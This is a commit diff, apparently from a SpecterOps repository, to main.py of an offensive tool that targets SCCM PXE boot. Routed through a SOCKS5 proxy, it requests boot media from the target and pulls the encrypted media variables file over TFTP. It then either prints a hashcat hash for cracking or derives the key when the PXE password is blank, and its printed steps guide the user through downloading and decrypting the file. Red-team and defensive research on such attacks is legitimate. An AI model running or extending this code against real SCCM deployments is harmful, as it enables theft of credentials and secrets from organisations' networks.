Updated and added README

SpecterOps · Sep 4, 2024 · a57ae8c · a57ae8c
1 parent 23b32e9
commit a57ae8c
Showing 1 changed file with 14 additions and 16 deletions.
diff --git a/main.py b/main.py
@@ -21,32 +21,30 @@
 sccm_client = sccm.SCCM(args.target, 4011, client)
 (variables,bcd,cryptokey) = sccm_client.send_bootp_request(args.src_ip, "11:22:33:44:55:66")
 
+print(f"[*] Variables file: {variables}")
+print(f"[*] BCD file: {bcd}")
+
 client.close()
 
 # TFTP Limitation over SOCKS5 means we can only grab the first few bytes (we can't ack the request):()
 client = socks.SOCKS5Client(args.socks_host, args.socks_port)
 client.connect()
 
-# tftp_client = tftp.TFTPClient(args.target, 69, client)
-
-# data_a = tftp_client.get_file(variables)
-# data_b = tftp_client.get_file(bcd)
+tftp_client = tftp.TFTPClient(args.target, 69, client)
+data_variables = tftp_client.get_file(variables)
 
 if cryptokey == None:
-    hashcat_hash = f"$sccm$aes128${sccm_client.read_media_variable_file_header(data_a).hex()}"
+    hashcat_hash = f"$sccm$aes128${sccm_client.read_media_variable_file_header(data_variables).hex()}"
     print(hashcat_hash)
-    print("Try cracking this hash to read the media file")
+    print("[*] Try cracking this hash to read the media file")
 else:
-    print("Blank password on PXE media file found!")
-    print("Attempting to decrypt it...")
+    print("[*] Blank password on PXE media file found!")
+    print("[*] Attempting to decrypt it...")
     decrypt_password = sccm_client.derive_blank_decryption_key(cryptokey)
     if( decrypt_password ):
-        print("Password retrieved: " + decrypt_password.hex())
+        print("[*] Password retrieved: " + decrypt_password.hex())
 
-        #media_variables = sccm_client.decrypt_media_file(data_a, decrypt_password)
-        #if( media_variables ):
-        #    sccm_client.process_pxe_media_xml(media_variables)
-
-# client.send(example_dns_a_request, ("192.168.130.12", 4011))
-# data = client.recv(1024)
-# print(data)
+print("[*] Once you have the key, download the variables file from:")
+print(f"[*] \\\\{args.target}\\REMINST{variables}")
+print("[*] You can then decrypt this with PXEThiefy.py using:")
+print("[*] python3 pxethiefy.py decrypt -p PASSWORD -f <variables_file>")